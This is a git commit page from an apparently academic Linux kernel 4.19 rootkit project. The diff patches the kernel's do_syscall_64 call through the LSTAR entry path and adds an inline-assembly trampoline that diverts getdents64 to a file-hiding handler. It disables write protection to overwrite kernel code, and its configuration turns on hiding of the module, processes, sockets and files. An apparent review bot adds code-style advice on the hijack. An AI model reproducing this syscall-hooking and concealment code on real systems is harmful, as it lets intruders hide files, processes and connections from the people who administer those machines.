linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 81c0c77a8f26504f2e25a09a22e78149c690caa9
parent cb19796b3001905fc422fa9912b21de1fc661eb3
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 10 Jan 2021 14:54:23 +0100

It works?!

Diffstat:
Msrc/filehide_lstar.c | 23++++++++++++++++++++---
Msrc/g7.c | 2+-
2 files changed, 21 insertions(+), 4 deletions(-)

diff --git a/src/filehide_lstar.c b/src/filehide_lstar.c
@@ -40,6 +40,7 @@ static char *find_do_syscall_64(char *lstar_addr);
 void g7_syscall_64(unsigned long, struct pt_regs *);
 void (*do_syscall_64)(unsigned long, struct pt_regs *);
+void check_getdents64(void);
 static char *syscall_64_ptr;
 static unsigned long oldOff;
@@ -54,11 +55,14 @@ hide_files_lstar(void)
 //Calculate new call offset to our function
 //newOff = g7_syscall_64_addr - nextOpcodeAddr
- unsigned long newOff = (unsigned long)g7_syscall_64 - ((unsigned long)syscall_64_ptr + 5);
+ unsigned long newOff = (unsigned long)check_getdents64 - ((unsigned long)syscall_64_ptr + 5);
 disable_protection();
+ memcpy((void *)check_getdents64, "\x90\x90\x90\x90\x90", 5);
 memcpy((syscall_64_ptr + 1), &newOff, 4);
 enable_protection();
+
+ hexdump((char *)check_getdents64, 32);
 }
 void
@@ -67,11 +71,12 @@ unhide_files_lstar(void)
 disable_protection();
 memcpy((syscall_64_ptr + 1), &oldOff, 4);
 enable_protection();
- while (atomic_read(&syscall64_count) > 0)
- msleep(250);
+ if (atomic_read(&syscall64_count) > 0)
+ msleep(10000);
 }
 //Only use with multiples of 16..
+//Best friend for this exercise, alongside https://defuse.ca/online-x86-assembler.htm
 static void
 hexdump(char *addr, int n)
 {
@@ -136,6 +141,17 @@ find_do_syscall_64(char *lstar_addr)
 }
 void
+check_getdents64(void)
+{
+ __asm__ volatile (
+ "\tcmp $217, %%rdi\n"
+ "\tje g7_syscall_64\n"
+ "\tjmp *%0\n"
+ :: "r"(do_syscall_64)
+ );
+}
+
+void
 g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
 {
 atomic_inc(&syscall64_count);
@@ -143,6 +159,7 @@ g7_syscall_64(unsigned long nr, struct pt_regs *pt_regs)
 if (nr == __NR_getdents64) {
+ DEBUG_INFO("We are here!\n");
 //
 // ( ͡°Ĺ̯ ͡° )
 //
diff --git a/src/g7.c b/src/g7.c
@@ -41,7 +41,7 @@ static struct file_operations g7_fops =
 rootkit_t rootkit = {
 .hiding_module = true,
- .hiding_files = true,
+ .hiding_files = false,
 .hiding_open = true,
 .hiding_pids = true,
 .hiding_sockets = true,
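Review bot: In the check_getdents64 hunk the comparison `cmp $217, %%rdi` hard-codes the syscall number as a bare literal, while the C path in g7_syscall_64 in the following hunk of the same file spells the same test as `nr == __NR_getdents64`; two hand-maintained copies of that number can silently drift apart, and the asm gives no hint what 217 stands for. At minimum the literal needs a comment such as `/* 217 == __NR_getdents64 on x86-64; keep in sync with g7_syscall_64 */` above the asm statement, or the operand could be built from the same macro the file already uses so there is a single source for the value. The new function also carries no header comment saying that it is entered with the raw syscall number in rdi and forwards to do_syscall_64 otherwise, which is what a reader needs to understand the `je`/`jmp` pair.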